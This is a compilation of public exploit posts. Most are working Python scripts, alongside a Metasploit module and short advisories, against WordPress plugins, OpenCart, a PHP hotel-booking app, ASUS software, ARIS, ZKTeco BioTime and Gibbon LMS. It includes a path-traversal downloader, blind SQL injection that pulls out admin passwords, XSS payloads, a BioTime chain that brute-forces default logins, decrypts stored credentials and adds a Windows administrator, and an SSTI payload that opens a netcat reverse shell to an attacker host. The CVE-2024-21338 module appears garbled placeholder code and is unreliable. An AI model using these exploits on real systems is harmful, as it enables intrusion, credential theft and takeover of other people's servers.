<pre><code># Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal<br /># Date: 2024-03-06<br /># Exploit Author: Ven3xy<br /># Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip<br /># Version: 2.7.10<br /># Tested on: Linux<br /><br />import sys<br />import requests<br />from urllib.parse import urljoin<br />import time<br /><br />def exploit(target_url, file_name, depth):<br /> traversal = '../' * depth<br /><br /> exploit_url = urljoin(target_url, '/wp-admin/tools.php')<br /> params = {<br /> 'page': 'backup_manager',<br /> 'download_backup_file': f'{traversal}{file_name}'<br /> }<br /><br /> response = requests.get(exploit_url, params=params)<br /><br /> if response.status_code == 200 and response.headers.get('Content-Disposition') \<br /> and 'attachment; filename' in response.headers['Content-Disposition'] \<br /> and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:<br /> print(response.text) # Replace with the desired action for the downloaded content<br /><br /> file_path = f'simplebackup_{file_name}'<br /> with open(file_path, 'wb') as file:<br /> file.write(response.content)<br /><br /> print(f'File saved in: {file_path}')<br /> else:<br /> print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")<br /><br />if __name__ == "__main__":<br /> if len(sys.argv) != 4:<br /> print("Usage: python exploit.py <target_url> <file_name> <depth>")<br /> sys.exit(1)<br /><br /> target_url = sys.argv[1]<br /> file_name = sys.argv[2]<br /> depth = int(sys.argv[3])<br /> print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n")<br /> time.sleep(5)<br /><br /><br /> exploit(target_url, file_name, depth)<br /><br /></code></pre>
<pre><code># Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi<br /># Date: 2024-04-2<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.opencart.com/<br /># Software Link: https://github.com/opencart/opencart/releases<br /># Version: 4.0.2.3<br /># Tested on: XAMPP, Linux<br /># Contact: https://twitter.com/dmaral3noz<br />* Description :<br />Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.<br />Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.<br />* Steps to Reproduce :<br />- Go to : http://127.0.0.1/index.php?route=product/search&search=test<br />- New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs<br />===========<br />Output :<br />Parameter: search (GET)<br />Type: boolean-based blind<br />Title: AND boolean-based blind - WHERE or HAVING clause<br />Payload: route=product/search&search=') AND 2427=2427-- drCa<br />Type: time-based blind<br />Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb<br /><br /></code></pre>
<pre><code># Exploit Title: Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)<br /># Google Dork: n/a<br /># Date: 04/02/2024<br /># Exploit Author: Gian Paris C. Agsam<br /># Vendor Homepage: https://github.com/projectworldsofficial<br /># Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip<br /># Version: 1.0<br /># Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12<br /># CVE : n/a<br /><br />import requests<br />import argparse<br />from colorama import (Fore as F, Back as B, Style as S)<br /><br />BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE<br /><br />requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)<br />proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}<br /><br />parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')<br />parser.add_argument('-u', '--url', help='')<br />args = parser.parse_args()<br /><br /><br />def banner():<br /> print(f"""{FR}<br /> ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄ ▄▄▄ ▪ ·▄▄▄▄ <br />▪ ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪ ██ ██▪ ██ <br /> ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄ ▄█▀▄ ▐█·▐█· ▐█▌<br />▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██ <br /> ▀█▄▀▪▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀ ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀• <br /> Github: https://github.com/offensive-droid <br /> {FW}<br /> """)<br /><br /><br /># Define the characters to test<br />chars = [<br /> 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',<br /> 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D',<br /> 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',<br /> 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7',<br /> '8', '9', '@', '#'<br />]<br /><br />def sqliPayload(char, position, userid, column, table):<br /> sqli = 'admin\' UNION SELECT IF(SUBSTRING('<br /> sqli += str(column) + ','<br /> sqli += str(position) + ',1) = \''<br /> sqli += str(char) + '\',sleep(3),null) FROM '<br /> sqli += str(table) + ' WHERE uname="admin"\''<br /> return sqli<br /><br />def postRequest(URL, sqliReq, char, position):<br /> sqliURL = URL<br /> params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}<br /> req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)<br /> if req.elapsed.total_seconds() >= 2:<br /> print("{} : {}".format(char, req.elapsed.total_seconds()))<br /> return char<br /><br /> return ''<br /><br />def theHarvester(target, CHARS, url):<br /> #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id']))<br /> print("Retrieving admin password".format(target['table'], target['column'], target['id']))<br /> position = 1<br /> full_pass = ""<br /> while position < 5:<br /> for char in CHARS:<br /> sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])<br /> found_char = postRequest(url, sqliReq, char, position)<br /> full_pass += found_char<br /> position += 1<br /> return full_pass<br /><br />if __name__ == "__main__":<br /> banner()<br /> HOST = str(args.url)<br /> PATH = HOST + "/hotel booking/admin/login.php"<br /> adminPassword = {"id": "1", "table": "manager", "column": "upass"}<br /> adminPass = theHarvester(adminPassword, chars, PATH)<br /> print("Admin Password:", adminPass)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service Path<br />Privilege Escalation<br /># Date: 2024-04-02<br /># Exploit Author: Alaa Kachouh<br /># Vendor Homepage:<br />https://www.asus.com/campaign/ASUS-Control-Center-Express/global/<br /># Version: Up to 01.06.15<br /># Tested on: Windows<br /># CVE: CVE-2024-27673<br /><br />===================================================================<br />ASUS Control Center Express Version =< 01.06.15 contains an unquoted<br />service path which allows attackers to escalate privileges to the system<br />level.<br />Assuming attackers have write access to C:\, the attackers can abuse the<br />Asus service "Apro console service"/apro_console.exe which upon restarting<br />will invoke C:\Program.exe with SYSTEM privileges.<br /><br />The binary path of the service alone isn't susceptible, but upon its<br />initiation, it will execute C:\program.exe as SYSTEM.<br /><br />Service Name: AProConsoleService<br />binary impacted: apro_console.exe<br /><br /># If a malicious payload is inserted into C:\ and service is executed in<br />any way, this can grant privileged access to the system and perform<br />malicious activities.<br /><br /></code></pre>
<pre><code>#############################################<br /># Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 #<br />#<br /># This module requires Metasploit: https://metasploit.com/download<br />#<br /># Author : E1.Coders #<br /># #<br /># Contact : E1.Coders [at] Mail [dot] RU #<br /># #<br /># Security Risk : High #<br /># #<br /># #<br />#############################################<br /><br /> <br />require 'msf/core'<br /> <br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /> <br /> include Msf::Exploit::Remote::DCERPC<br /> include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact<br /> <br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'CVE-2024-21338 Exploit',<br /> 'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',<br /> 'Author' => 'You',<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2024-21338']<br /> ]<br /> )<br /> )<br /> <br /> register_options(<br /> [<br /> OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),<br /> OptPort.new('RPORT', [true, 'The target port', 1234])<br /> ]<br /> )<br /> end<br /> <br /> def check<br /> connect<br /> <br /> begin<br /> impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')<br /> rescue Rex::Post::Meterpreter::RequestError<br /> return Exploit::CheckCode::Safe<br /> end<br /> <br /> Exploit::CheckCode::Appears<br /> end<br /> <br /> def exploit<br /> connect<br /> <br /> begin<br /> impacket_artifact(<br /> dcerpc_binding('ncacn_ip_tcp'),<br /> 'FooBar',<br /> datastore['FooBarPayload']<br /> )<br /> rescue Rex::Post::Meterpreter::RequestError<br /> fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'<br /> end<br /> <br /> handler<br /> disconnect<br /> end<br />end<br /> <br /> <br />#refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338<br /> <br /></code></pre>
<pre><code>## Exploit Title: Wordpress Gutenberg Plugin Version 18.0.0 Stored XSS<br />### Date: 2024-3-29<br />### Exploit Author: tmrswrr<br />### Category: Webapps<br />### Vendor Homepage: https://wordpress.org/plugins/gutenberg/<br />### Version 18.0.0<br /><br /><br />1 ) Go to Gutenberg Plugin edit page : https://127.0.0.1/WordPress/2024/03/29/welcome-to-the-gutenberg-editor/#comment-4<br />2 ) Write Leave a Reply place your payload :<br /><sVg/onLy=1 onLoaD=confirm(1)//<br />3 ) After save will be see alert button<br /></code></pre>
<pre><code># Exploit Title: Stored Cross-Site Scripting (XSS) in ARIS: Business<br />Process Management<br /># Edition Version 10.0.21.0<br /># Exploit Author: Seid Yassin<br /># Date: 2024-03-28<br /># Vendor: Software AG<br /># Software Link: https://aris.com/<br /># Version: ARIS: Business Process Management<br /><br />## Description:<br /><br />Discovered a file upload feature lacking proper file extension validation.<br />This vulnerability allows attackers to upload any type of file, including<br />malicious ones. To demonstrate this, we successfully uploaded an SVG file<br />to carry out a Cross-Site Scripting (XSS) attack. In XSS attacks, malicious<br />scripts are injected into web pages viewed by other users, potentially<br />leading to data theft or unauthorized actions leading to potential theft of<br />cookies and session tokens.<br /><br />## Background:<br /><br />Cross-site scripting (XSS) is a common web security vulnerability that<br />compromises user interactions with a vulnerable application. Stored XSS<br />occurs when user input is stored in the application and executed whenever a<br />user triggers or visits the page.<br /><br />## Issue:<br /><br />A stored cross-site scripting (XSS) vulnerability in ARIS: Business Process<br />Management software enables a malicious authenticated user to store a xss<br />payload(via SVG) using the web interface. Then, when viewed by a properly<br />authenticated user or administrator, the JavaScript payload executes within<br />SVG and disguises all associated actions as performed by that unsuspecting<br />authenticated user/administrator.<br /><br />## Steps To Reproduce:<br /><br />1. Log into the ARIS application.<br />2. Navigate to my tasks and select any of the task and upload documents<br />(change request form)<br />3. Insert any svg file with xss script in it . eg.<br />https://gist.github.com/rudSarkar/76f1ce7a65c356a5cd71d058ab76a344<br /><br />## Expected Result:<br /><br />After a user uploads a new document in the Change Request Form, they can<br />utilize the link for the SVG file and UUID to access another path at<br />{{url}}/documents/api/documents/{{UUID}}/content<br /><br />## Actual Result:<br /><br />The ARIS application is vulnerable to Stored Cross-Site Scripting, as<br />evidenced by the successful execution of the injected payload.<br /><br />## Proof of Concept:<br /><br />Attached Screenshots for the reference.<br /></code></pre>
<pre><code># __________.__ ___________.__ <br /># \______ \__| ___\__ ___/|__| _____ ____ <br /># | | _/ |/ _ \| | | |/ \_/ __ \ <br /># | | \ ( <_> ) | | | Y Y \ ___/ <br /># |______ /__|\____/|____| |__|__|_| /\___ ><br /># \/ \/ \/ <br /># Tested on 8.5.5 (Build:20231103.R1905)<br /># Tested on 9.0.1 (Build:20240108.18753)<br /># BioTime, "time" for shellz!<br /># https://claroty.com/team82/disclosure-dashboard/cve-2023-38952<br /># https://claroty.com/team82/disclosure-dashboard/cve-2023-38951<br /># https://claroty.com/team82/disclosure-dashboard/cve-2023-38950<br /># RCE by adding a user to the system, not the app.<br /># Relay machine creds over smb, while creating a backup<br /># Decrypt SMTP, LDAP or SFTP creds, if any.<br /># Get sql backup. Good luck cracking those hashes!<br /># Can use Banner to determine which version is running<br /># Server: Apache/2.4.29 (Win64) mod_wsgi/4.5.24 Python/2.7<br /># Server: Apache/2.4.52 (Win64) mod_wsgi/4.7.1 Python/3.7<br /># Server: Apache/2.4.48 (Win64) mod_wsgi/4.7.1 Python/3.7<br /># Server: Apache => BioTime Version 9<br /># @w3bd3vil - Krash Consulting (https://krashconsulting.com/fury-of-fingers-biotime-rce/)<br />import requests<br />from bs4 import BeautifulSoup<br />import os<br />import json<br />import sys<br />from Crypto.Cipher import AES<br />from Crypto.Cipher import ARC4<br />import base64<br />from binascii import b2a_hex, a2b_hex<br /><br />requests.packages.urllib3.disable_warnings()<br /><br />proxies = {<br /> 'http': 'http://127.0.0.1:8080', # Proxy for HTTP traffic<br /> 'https': 'http://127.0.0.1:8080' # Proxy for HTTPS traffic<br />}<br />proxies = {}<br /><br />target = sys.argv[1]<br /><br /><br /><br />def decrypt_rc4(base64_encoded_rc4, password="biotime"):<br /> encrypted_data = base64.b64decode(base64_encoded_rc4)<br /> cipher = ARC4.new(password.encode())<br /> decrypted_data = cipher.decrypt(encrypted_data)<br /> return decrypted_data.decode()<br /><br /># base64_encoded_rc4 = "fj8xD5fAY6r6s3I="<br /># password = "biotime"<br /><br /># decrypted_data = decrypt_rc4(base64_encoded_rc4, password)<br /># print("Decrypted data:", decrypted_data)<br /><br />AES_PASSWORD = b'china@2018encryption#aes'<br />AES_IV = b'zkteco@china2019'<br /><br />def filling_data(data, restore=False):<br /> '''<br /> :param data: str<br /> :return: str<br /> '''<br /> if restore:<br /> return data[0:-ord(data[-1])]<br /> block_size = AES.block_size # Use AES.block_size instead of None.block_size<br /> return data + (block_size - len(data) % block_size) * chr(block_size - len(data) % block_size)<br /><br />def aes_encrypt(content):<br /> '''<br /> Encryption<br /> :param content: str, The length of content must be times of AES.block_size, using filling_data to fill out<br /> :return: str<br /> '''<br /> if isinstance(content, bytes):<br /> content = str(content, 'utf-8')<br /> cipher = AES.new(AES_PASSWORD, AES.MODE_CBC, AES_IV)<br /> encrypted = cipher.encrypt(filling_data(content).encode('utf-8'))<br /> result = b2a_hex(encrypted).decode('utf-8')<br /> return result<br /><br />def aes_decrypt(content):<br /> '''<br /> Decryption<br /> :param content: str or bytes, Encryption string<br /> :return: str<br /> '''<br /> if isinstance(content, str):<br /> content = content.encode('utf-8')<br /> cipher = AES.new(AES_PASSWORD, AES.MODE_CBC, AES_IV)<br /> result = cipher.decrypt(a2b_hex(content)).decode('utf-8')<br /> return filling_data(result, restore=True)<br /><br />#Check BioTime<br />url = f'{target}/license/'<br />response = requests.get(url, proxies=proxies, verify=False)<br />html_content = response.content<br /><br /><br />soup = BeautifulSoup(html_content, 'html.parser')<br />build_lines = [line.strip() for line in soup.get_text().split('\n') if 'build' in line.lower()]<br /><br />build = None<br />for line in build_lines:<br /> build = line<br /> print(f"Found BioTime: {line}")<br /> break<br /><br />if build != None:<br /> buildNumber = build[0]<br />else:<br /> print("Unsupported Target!")<br /> sys.exit(1)<br /><br /># Dir Traversal<br />url = f'{target}/iclock/file?SN=win&url=/../../../../../../../../windows/win.ini'<br />response = requests.get(url, proxies=proxies, verify=False)<br />try:<br /> print("Dir Traversal Attempt\nOutput of windows/win.ini file:")<br /> print(base64.b64decode(response.text).decode('utf-8'))<br /> try:<br /> url = f'{target}/iclock/file?SN=att&url=/../../../../../../../../biotime/attsite.ini'<br /> response = requests.get(url, proxies=proxies, verify=False)<br /> attConfig = base64.b64decode(response.text).decode('utf-8')<br /> #print(f"Output of BioTime config file: {attConfig}")<br /> except:<br /> try:<br /> url = f'{target}/iclock/file?SN=att&url=/../../../../../../../../zkbiotime/attsite.ini'<br /> response = requests.get(url, proxies=proxies, verify=False)<br /> attConfig = base64.b64decode(response.text).decode('utf-8')<br /> #print(f"Output of BioTime config file: {attConfig}")<br /> except:<br /> print("Couldn't get BioTime config file (possibly non default configuration)")<br /> lines = attConfig.split('\n')<br /><br /> for i, line in enumerate(lines):<br /> if "PASSWORD=@!@=" in line:<br /> dec_att = decrypt_rc4(lines[i].split("@!@=")[1])<br /> lines[i] = lines[i].split("@!@=")[0]+dec_att<br /> attConfig_modified = '\n'.join(lines)<br /> print(f"Output of BioTime Decrypted config file:\n{attConfig_modified}")<br />except:<br /> print("Couldn't exploit Dir Traversal")<br /><br /><br /># Extract Cookies<br />url = f'{target}/login/'<br /><br />response = requests.get(url, proxies=proxies, verify=False)<br /><br />if response.status_code == 200:<br /> soup = BeautifulSoup(response.text, 'html.parser')<br /><br /> csrf_token_header = soup.find('input', {'name': 'csrfmiddlewaretoken'})<br /> if csrf_token_header:<br /> csrf_token_header_value = csrf_token_header['value']<br /> print(f"CSRF Token Header: {csrf_token_header_value}")<br /> <br /> session_id_cookie = response.cookies.get('sessionid')<br /> if session_id_cookie:<br /> print(f"Session ID: {session_id_cookie}")<br /> <br /> csrf_token_value = response.cookies.get('csrftoken')<br /> if csrf_token_value:<br /> print(f"CSRF Token Cookie: {csrf_token_value}")<br />else:<br /> print(f"Failed to retrieve data from {url}. Status code: {response.status_code}")<br /><br /># Login Now!<br />cookies = {<br /> 'sessionid': session_id_cookie,<br /> 'csrftoken': csrf_token_value<br />}<br /><br />for i in range(1,10):<br /> username = i<br /> password = '123456' # Deafult password!<br /><br /> data = {<br /> 'username': username,<br /> 'password': password,<br /> 'captcha':'',<br /> 'login_user':'employee'<br /> }<br /><br /> headers = {<br /> 'User-Agent': 'Krash Consulting',<br /> 'X-CSRFToken': csrf_token_header_value<br /> }<br /><br /> response = requests.post(url, data=data, cookies=cookies, headers=headers, proxies=proxies, verify=False)<br /><br /> if response.status_code == 200:<br /> json_response = response.json()<br /> ret_value = json_response.get('ret')<br /> if ret_value == 0:<br /> print(f"Valid Credentials found: Username is {username} and password is {password}")<br /> session_id_cookie = response.cookies.get('sessionid')<br /> if session_id_cookie:<br /> print(f"Auth Session ID: {session_id_cookie}")<br /> <br /> csrf_token_value = response.cookies.get('csrftoken')<br /> if csrf_token_value:<br /> print(f"Auth CSRF Token Cookie: {csrf_token_value}")<br /> break<br /><br />if i == 9:<br /> print("No valid users found!")<br /> sys.exit(1)<br /><br /># Check for Backups<br />def downloadBackup():<br /> url = f'{target}/base/dbbackuplog/table/?page=1&limit=33'<br /> cookies = {<br /> 'sessionid': session_id_cookie,<br /> 'csrftoken': csrf_token_value<br /> }<br /><br /> response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)<br /> response_data = response.json()<br /> print("Backup files list")<br /> print(json.dumps(response_data, indent=4))<br /><br /> if response_data['count'] > 0:<br /> backup_info = response_data['data'][0] # Latest Backup<br /> operator_name = backup_info['operator']<br /> backup_file = backup_info['backup_file']<br /> db_type = backup_info['db_type']<br /><br /><br /> print("Operator:", operator_name)<br /> print("Backup File:", backup_file)<br /> print("Database Type:", db_type)<br /><br /> if buildNumber == "9":<br /> createBackup()<br /> print("Backup File password: Krash")<br /><br /> #download = os.path.basename(backup_file)<br /><br /> path = os.path.normpath(backup_file)<br /> try:<br /> split_path = path.split(os.sep)<br /> files_index = split_path.index('files')<br /> relative_path = '/'.join(split_path[files_index + 1:])<br /> except:<br /> return False<br /><br /> url = f'{target}/files/{relative_path}'<br /> print(url)<br /> response = requests.get(url, proxies=proxies, verify=False)<br /> if response.status_code == 200:<br /> filename = os.path.basename(url)<br /> with open(filename, 'wb') as file:<br /> file.write(response.content)<br /> print(f"File '{filename}' downloaded successfully.")<br /> else:<br /> print("Failed to download the file. Status code:", response.status_code)<br /> return False<br /> else:<br /> print("No backup Found!")<br /> return True<br /><br />def createBackup(targetPath=None):<br /> print("Attempting to create backup.")<br /> url = f'{target}/base/dbbackuplog/action/?action_name=44424261636b75704d616e75616c6c79&_popup=true&id='<br /> cookies = {<br /> 'sessionid': session_id_cookie,<br /> 'csrftoken': csrf_token_value<br /> }<br /> response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)<br /> html_content = response.content<br /><br /> soup = BeautifulSoup(html_content, 'html.parser')<br /> pathBackup = [line.strip() for line in soup.get_text().split('\n') if 'name="file_path"' in line.lower()]<br /> print(f"Possible backup location: {pathBackup}")<br /><br /><br /> url = f'{target}/base/dbbackuplog/action/'<br /><br /> if targetPath == None:<br /> if buildNumber == "9" or build[:5] == "8.5.5":<br /> targetPath = "C:\\ZKBioTime\\files\\backup\\"<br /> else:<br /> targetPath = "C:\\BioTime\\files\\fw\\"<br /> if buildNumber == "9":<br /> data = {<br /> 'csrfmiddlewaretoken': csrf_token_value,<br /> 'file_path':targetPath,<br /> 'action_name': '44424261636b75704d616e75616c6c79',<br /> 'backup_encryption_choices': '2',<br /> 'auto_backup_password': 'Krash'<br /> }<br /> else:<br /> data = {<br /> 'csrfmiddlewaretoken': csrf_token_value,<br /> 'file_path':targetPath,<br /> 'action_name': '44424261636b75704d616e75616c6c79'<br /> }<br /> response = requests.post(url, cookies=cookies, data=data, proxies=proxies, verify=False)<br /> if response.status_code == 200:<br /> print("Backup Initiated.")<br /> else:<br /> print("Backup failed!")<br /><br />if downloadBackup():<br /> createBackup()<br /> downloadBackup()<br /><br />url = f'{target}/base/api/systemSettings/email_setting/'<br />cookies = {<br /> 'sessionid': session_id_cookie,<br /> 'csrftoken': csrf_token_value<br />}<br /><br />response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)<br />if response.status_code == 200:<br /> response_data = response.json()<br /> print("SMTP Settings")<br /> for key in response_data:<br /> if 'password' in key.lower():<br /> value = response_data[key]<br /> #print(f'{key} decrypted value {aes_decrypt(value)}')<br /> response_data[key] = aes_decrypt(value)<br /><br /> print(json.dumps(response_data, indent=4))<br /><br /><br />url = f'{target}/base/api/systemSettings/ldap_setup/'<br />cookies = {<br /> 'sessionid': session_id_cookie,<br /> 'csrftoken': csrf_token_value<br />}<br /><br />response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)<br />if response.status_code == 200:<br /> response_data = response.json()<br /> print("LDAP Settings")<br /> for key in response_data:<br /> if 'password' in key.lower():<br /> value = response_data[key]<br /> #print(f'{key} decrypted value {aes_decrypt(value)}')<br /> response_data[key] = aes_decrypt(value)<br /> print(json.dumps(response_data, indent=4))<br /><br /><br />def sftpRCE():<br /> print("Attempting RCE!")<br /> #Add SFTP, Need valid IP/credentials here!<br /> print("Adding FTP List")<br /><br /> url = f'{target}/base/sftpsetting/add/'<br /> myIpaddr = '192.168.0.11'<br /> myUser = 'test'<br /> myPassword = 'test@123'<br /><br /> cookies = {<br /> 'sessionid': session_id_cookie,<br /> 'csrftoken': csrf_token_value<br /> }<br /> data = {<br /> 'csrfmiddlewaretoken': csrf_token_value,<br /> 'host':myIpaddr,<br /> 'port':22,<br /> 'is_sftp': 1,<br /> 'user_name':myUser,<br /> 'user_password':myPassword,<br /> 'user_key':'',<br /> 'action_name': '47656e6572616c416374696f6e4e6577'<br /> }<br /> response = requests.post(url, cookies=cookies, data=data, proxies=proxies, verify=False)<br /> print(response)<br /><br /> url = f'{target}/base/sftpsetting/table/?page=1&limit=33'<br /> cookies = {<br /> 'sessionid': session_id_cookie,<br /> 'csrftoken': csrf_token_value<br /> }<br /><br /> response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)<br /> response_data = response.json()<br /> print("FTP List")<br /> print(json.dumps(response_data, indent=4))<br /><br /> backup_info = response_data['data'][0] # Latest SFTP<br /> getID = backup_info['id']<br /><br /> if getID:<br /> print("ID to edit ", getID)<br /><br /> #Edit SFTP (Response can have errors, it doesn't matter)<br /> print("Editing SFTP Settings")<br /> if buildNumber == "9":<br /> dirTraverse = '\..\..\..\python311\lib\io.py'<br /> else:<br /> dirTraverse = '\..\..\..\python37\lib\io.py'<br /><br /> if len(dirTraverse) > 30:<br /> print("Directory Traversal length is greater than 30, will not work!")<br /> sys.exit(1)<br /><br /> url = f'{target}/base/sftpsetting/edit/'<br /><br /> cookies = {<br /> 'sessionid': session_id_cookie,<br /> 'csrftoken': csrf_token_value<br /> }<br /> data = {<br /> 'csrfmiddlewaretoken': csrf_token_value,<br /> 'host':myIpaddr,<br /> 'port':22,<br /> 'is_sftp': 1,<br /> 'user_name': dirTraverse,<br /> 'user_password':myPassword,<br /> 'user_key':'import os\nos.system("net user /add omair190 KCP@ssw0rd && net localgroup administrators ...',<br /> 'obj_id': getID<br /> }<br /> response = requests.post(url, cookies=cookies, data=data, proxies=proxies, verify=False)<br /> print("A new user should be added now on the server \nusername: omair190\npassword: KCP@ssw0rd")<br /><br /> #Delete SFTP<br /> print("Deleting SFTP Settings")<br /> url = f'{target}/base/sftpsetting/action/'<br /><br /> cookies = {<br /> 'sessionid': session_id_cookie,<br /> 'csrftoken': csrf_token_value<br /> }<br /> data = {<br /> 'csrfmiddlewaretoken': csrf_token_value,<br /> 'id': getID,<br /> 'action_name': '47656e6572616c416374696f6e44656c657465'<br /> }<br /> response = requests.post(url, cookies=cookies, data=data, proxies=proxies, verify=False)<br /><br />#RCE<br />if buildNumber == "9" or build[:5] == "8.5.5":<br /> sftpRCE()<br /><br /># #Relay Creds<br /># createBackup("\\\\192.168.0.11\\KC\\test")<br /></code></pre>
<pre><code># Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version<br /># Date: 21.01.2024<br /># Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)<br /># Vendor Homepage: https://gibbonedu.org/<br /># Software Link: https://github.com/GibbonEdu/core<br /># Version: v26.0.00<br /># Tested on: Ubuntu 22.0<br /># CVE : CVE-2024-24724<br />import requests<br />import re<br />import sys<br /><br /><br />def login(target_host, target_port,email,password):<br /> url = f'http://{target_host}:{target_port}/login.php?timeout=true'<br /> headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"}<br /> data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"<br /> r = requests.post(url, headers=headers, data=data, allow_redirects=False)<br /> Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])<br /> if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']):<br /> print("login successful!")<br /><br /> return Session_Cookie[4]<br /><br /><br /><br />def rce(cookie, target_host, target_port, attacker_ip, attacker_port):<br /> url = f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'<br /> headers = {"Content-Type": "multipart/form-data; boundary=---------------------------67142646631840027692410521651", "Cookie": cookie}<br /> data = f"-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n/modules/School Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n"<br /> r = requests.post(url, headers=headers, data=data, allow_redirects=False)<br /> if 'success0' in str(r.headers['Location']):<br /> print("Payload uploaded successfully!")<br /><br /><br /><br />def trigger(cookie, target_host, target_port):<br /> url = f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'<br /> headers = {"Cookie": cookie}<br /> print("RCE successful!")<br /> r = requests.get(url, headers=headers, allow_redirects=False)<br /><br /><br />if __name__ == '__main__':<br /> if len(sys.argv) != 7:<br /> print("Usage: script.py <target_host> <target_port> <attacker_ip> <attacker_port> <email> <password>")<br /> sys.exit(1)<br /> cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])<br /> rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])<br /> trigger(cookie, sys.argv[1], sys.argv[2])<br /></code></pre>
